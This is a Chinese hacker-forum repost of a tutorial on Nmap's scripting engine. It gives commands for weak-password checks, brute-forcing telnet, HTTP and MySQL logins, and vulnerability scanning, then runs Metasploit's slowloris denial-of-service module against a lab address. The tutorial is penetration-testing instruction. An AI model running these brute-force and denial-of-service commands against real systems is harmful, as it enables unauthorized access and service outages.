跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

精选回复

发布于

关于Nmap的教程,在前面的文章中写到过很多次了。通常情况下,我们是直接用Nmap扫描端口,然后再通过msf nessus进行漏洞扫描利用。所以整个过程比较繁琐,那么我们就要有必要认识一下Nmap的扩展脚本了!

2834770417.png

nmap --script

Nmap的脚本位置:/usr/share/nmap/scripts/
查看脚本的数量

ls /usr/share/nmap/scripts/ | wc -l

可以看到,目前有605个,当然这些插件我们可以自己编写,也可以去下载。总之很方便的。
168581594.png
nmap脚本主要分为以下几类,在扫描时可根据需要设置-–script=类别这种方式进行比较笼统的扫描:

脚本名说明
auth绕开鉴权 检测是否存在弱口令
broadcast局域网内探查更多服务开启状况
brute暴力破解方式,针对常见的应用如http/snmp等
default使用-sC或-A选项扫描时候默认的脚本
dos用于进行拒绝服务攻击
exploit利用已知的漏洞
vuln负责检查目标机是否有常见的漏洞

常用示例

检查弱口令

nmap --script=auth 192.168.123.1

2202637843.png

暴力破解

可对mysql http smtp等常见协议进行暴力破解。

nmap --script=brute 192.168.123.1

如下,我们通过暴力破解,得到了telent的登录密码为admin
2205908830.png
尝试登录
3174919864.png

默认脚本扫描

默认的脚本扫描,主要是搜集各种应用服务的信息,收集到后,可再针对具体服务进行攻击。

nmap --script=default 192.168.123.1
或者 
nmap -sC 192.168.123.1

检查是否存在常见漏洞

nmap --script=vuln  192.168.123.1

扫描得到,目标可能存在CVE:CVE-2007-6750漏洞
3915432862.png

漏洞利用

在msf中搜索此漏洞,配置相关信息即可!

search CVE-2007-6750
use auxiliary/dos/http/slowloris
show options
set rhost 192.168.123.1
run

2657993770.png

whois解析

我们对论坛地址bbskali.cn进行历史解析查询。

nmap --script external bbskali.cn

如下我们得到了很多有用的信息:
2609320756.png

HTTP认证爆破

nmap --script=http-brute 192.168.123.1

同样,我们这里以路由器的登录密码为破解对象,破解得到账号和密码为admin
注意:Nmap默认字典位置为:/usr/share/nmap/nselib/data
3125342470.png

网站目录扫描

类似于御剑那样,nmap也同样可对网站目录进行扫描。

nmap --script=http-ls bbskali.cn

mysql相关

#破解root密码
nmap -p3306 --script=mysql-empty-password.nse 192.168.123.129 
#列出mysql用户
nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 192.168.123.129

版权属于:逍遥子大表哥

本文链接:https://blog.bbskali.cn/3045.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。